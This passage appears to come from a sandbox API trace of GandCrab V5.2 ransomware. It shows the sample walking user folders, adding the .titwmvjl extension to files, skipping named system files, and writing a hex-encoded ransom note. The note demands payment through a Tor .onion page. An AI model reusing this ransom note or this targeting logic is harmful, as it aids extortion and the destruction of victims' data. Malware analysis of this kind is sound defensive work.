6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0091.215] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0091.216] CloseHandle (hObject=0x2b4) returned 1 [0091.216] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.216] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.216] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x24, wMilliseconds=0x218)) [0091.216] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.216] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.216] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.216] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\d2ca4a09d2ca4deb61a.lock") returned 75 [0091.216] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my shapes\\_private\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0091.217] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.217] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.217] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\") returned 51 [0091.217] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\*" [0091.217] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x503738 [0091.217] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.217] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0091.218] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.218] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.218] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0091.218] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0091.218] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0091.218] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\d2ca4a09d2ca4deb61a.lock" [0091.218] lstrlenW (lpString=".titwmvjl") returned 9 [0091.218] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\d2ca4a09d2ca4deb61a.lock") returned 75 [0091.218] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.218] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 84 [0091.218] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\d2ca4a09d2ca4deb61a.lock") returned 75 [0091.218] lstrlenW (lpString=".lock") returned 5 [0091.218] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.219] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0091.219] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.219] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.219] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0091.219] lstrcmpW (lpString1="folder.ico", lpString2=".") returned 1 [0091.219] lstrcmpW (lpString1="folder.ico", lpString2="..") returned 1 [0091.219] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\", lpString2="folder.ico" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\folder.ico") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\folder.ico" [0091.219] lstrlenW (lpString=".titwmvjl") returned 9 [0091.219] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\folder.ico") returned 61 [0091.219] VirtualAlloc (lpAddress=0x0, dwSize=0xba, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.219] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\folder.ico.titwmvjl") returned 70 [0091.219] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\folder.ico") returned 61 [0091.219] lstrlenW (lpString=".ico") returned 4 [0091.219] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.220] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ico ") returned 5 [0091.220] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.220] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.220] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0091.220] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0091.220] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0091.220] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\TITWMVJL-DECRYPT.txt" [0091.220] lstrlenW (lpString=".titwmvjl") returned 9 [0091.220] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\TITWMVJL-DECRYPT.txt") returned 71 [0091.220] VirtualAlloc (lpAddress=0x0, dwSize=0xce, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.220] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 80 [0091.220] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\TITWMVJL-DECRYPT.txt") returned 71 [0091.220] lstrlenW (lpString=".txt") returned 4 [0091.220] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.221] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0091.221] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0091.221] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.221] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\TITWMVJL-DECRYPT.txt") returned 71 [0091.221] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\TITWMVJL-DECRYPT.txt") returned 71 [0091.221] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0091.221] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0091.221] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0091.221] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0091.221] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0091.221] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0091.221] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0091.221] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0091.221] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.221] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0091.221] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0091.222] CloseHandle (hObject=0x2b4) returned 1 [0091.222] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0091.222] FindClose (in: hFindFile=0x503638 | out: hFindFile=0x503638) returned 1 [0091.223] CloseHandle (hObject=0x2ac) returned 1 [0091.223] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.223] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0091.223] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0091.223] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos" [0091.223] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\" [0091.223] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0091.223] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.223] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.224] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.224] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.224] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.224] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.224] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.224] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.224] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.224] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.224] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\\\TITWMVJL-DECRYPT.txt") returned 63 [0091.224] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my videos\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0091.225] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\